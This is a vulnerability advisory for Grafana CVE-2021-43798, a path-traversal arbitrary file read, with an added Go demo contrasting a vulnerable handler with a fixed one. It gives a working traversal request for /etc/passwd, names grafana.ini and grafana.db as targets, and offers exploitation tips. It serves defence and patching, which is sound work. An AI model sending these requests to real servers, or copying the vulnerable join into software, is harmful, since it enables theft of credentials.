Grafana - Arbitrary File Read (CVE-2021-43798)
- Severity: CVSSv3 score 7.5 (High)
- Vulnerability description
Grafana is affected by an arbitrary file read caused by a path traversal in the /public/plugins/<plugin-id>/ endpoint, which serves the static assets of installed plugins. The handler joins the user-controlled remainder of the URL onto the plugin's directory without checking that the resulting path still lies inside that directory, and Grafana's router does not strip ../ segments before routing, so a request such as /public/plugins/<plugin-id>/../../../../../../etc/passwd, issued under the ID of any installed plugin (for example the built-in alertlist), returns the file. All versions from 8.0.0-beta1 up to and including 8.3.0 are affected. A reverse proxy that normalises dot segments before forwarding can mask the issue, so the check should be run against the Grafana listener itself (default port 3000).
- Risk description
A remote, unauthenticated attacker can exploit this vulnerability to read any file the Grafana process can access on the server file system, including Grafana's own configuration (grafana.ini, which may hold the admin password, database credentials and secret_key) and its SQLite database grafana.db.
- Exploit capabilities
Sniper can read arbitrary files from the target system and extract them as evidence.
- Recommendation
Upgrade to a patched release: 8.3.1, 8.2.7, 8.1.8 or 8.0.7 (or any later release in the same minor line), or to the latest Grafana version. Until the upgrade is applied, restricting network access to the Grafana listener reduces exposure.
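The program below is an added example, not code from Grafana or from this page. It reproduces the faulty join described above inside a small HTTP handler, puts the containment check that closes the hole beside it, and sends the same traversal request a scanner would, so the difference between a vulnerable and a patched build is visible end to end. The plugin ID alertlist is a real built-in Grafana plugin; the directory layout, file names, the installed-plugin map and the handler itself are constructed for the demo and are simplified relative to Grafana's real plugin asset handler.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"os"
	"path/filepath"
	"strings"
)

// installed stands in for Grafana's plugin registry: the traversal works only
// beneath a plugin ID that really exists; alertlist ships with every Grafana.
var installed = map[string]bool{"alertlist": true}

// vulnerableResolve reproduces the pre-fix join. filepath.Clean keeps a
// leading "..", so Join walks straight out of the plugin directory.
func vulnerableResolve(pluginDir, requested string) (string, error) {
	return filepath.Join(pluginDir, filepath.Clean(requested)), nil
}

var errOutsidePluginDir = errors.New("requested file resolves outside the plugin directory")

// safeResolve performs the same join, then refuses any result that is not
// inside pluginDir. Symlinks planted inside pluginDir are a separate concern.
func safeResolve(pluginDir, requested string) (string, error) {
	absDir, err := filepath.Abs(pluginDir)
	if err != nil {
		return "", err
	}
	target := filepath.Join(absDir, filepath.Clean(requested))
	rel, err := filepath.Rel(absDir, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errOutsidePluginDir
	}
	return target, nil
}

// pluginAssetHandler serves /public/plugins/<id>/<file>. It is a bare
// http.Handler rather than an http.ServeMux, so r.URL.Path arrives with its
// ".." segments intact, as it did behind Grafana's own router.
func pluginAssetHandler(pluginsRoot string, resolve func(string, string) (string, error)) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		const prefix = "/public/plugins/"
		pluginID, file, ok := strings.Cut(strings.TrimPrefix(r.URL.Path, prefix), "/")
		if !strings.HasPrefix(r.URL.Path, prefix) || !ok || !installed[pluginID] {
			http.NotFound(w, r)
			return
		}
		if path, err := resolve(filepath.Join(pluginsRoot, pluginID), file); err == nil {
			if data, readErr := os.ReadFile(path); readErr == nil {
				w.Write(data)
				return
			}
		}
		http.NotFound(w, r)
	})
}

// probe sends what a scanner sends: GET /public/plugins/<id>/../../<file>.
// The URL is concatenated and url.Parse keeps dot segments, so "../" hits the wire as-is.
func probe(baseURL, pluginID, relPath string) (int, string, error) {
	resp, err := http.Get(baseURL + "/public/plugins/" + pluginID + "/" + relPath)
	if err != nil {
		return 0, "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return resp.StatusCode, string(body), err
}

// runDemo lays out a constructed fixture (not real Grafana files), serves it
// with one of the two resolvers and probes for secret.txt two levels above
// the plugin directory. It returns the HTTP status and body the probe saw.
func runDemo(fixed bool) (int, string, error) {
	root, err := os.MkdirTemp("", "grafana-demo")
	if err != nil {
		return 0, "", err
	}
	defer os.RemoveAll(root)
	pluginDir := filepath.Join(root, "plugins", "alertlist")
	if err := os.MkdirAll(pluginDir, 0o755); err != nil {
		return 0, "", err
	}
	os.WriteFile(filepath.Join(pluginDir, "module.js"), []byte("// plugin"), 0o644)
	os.WriteFile(filepath.Join(root, "secret.txt"), []byte("SECRET"), 0o600)

	resolve := vulnerableResolve
	if fixed {
		resolve = safeResolve
	}
	srv := httptest.NewServer(pluginAssetHandler(filepath.Join(root, "plugins"), resolve))
	defer srv.Close()
	return probe(srv.URL, "alertlist", "../../secret.txt")
}

func main() {
	for _, fixed := range []bool{false, true} {
		status, body, err := runDemo(fixed)
		fmt.Printf("fixed=%v status=%d body=%q err=%v\n", fixed, status, body, err)
	}
}
```

Two details carry over to real targets. Surplus ../ segments are harmless to the attacker because filepath.Join collapses them at the file system root, which is why public payloads simply use a long run of them rather than guessing the install depth. And a 404 from the patched resolver looks identical to a 404 for a missing file, so a scanner should confirm with a file it knows exists (such as /etc/passwd) rather than treat any 404 as "patched".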
- Codename: Not available
- Detectable with: Network Scanner
- Exploitable with Sniper: Yes
- Vuln date: Nov 2021
- Published at
- Updated at
- Software type: Monitoring system
- Vendor: Grafana Labs
- Product: Grafana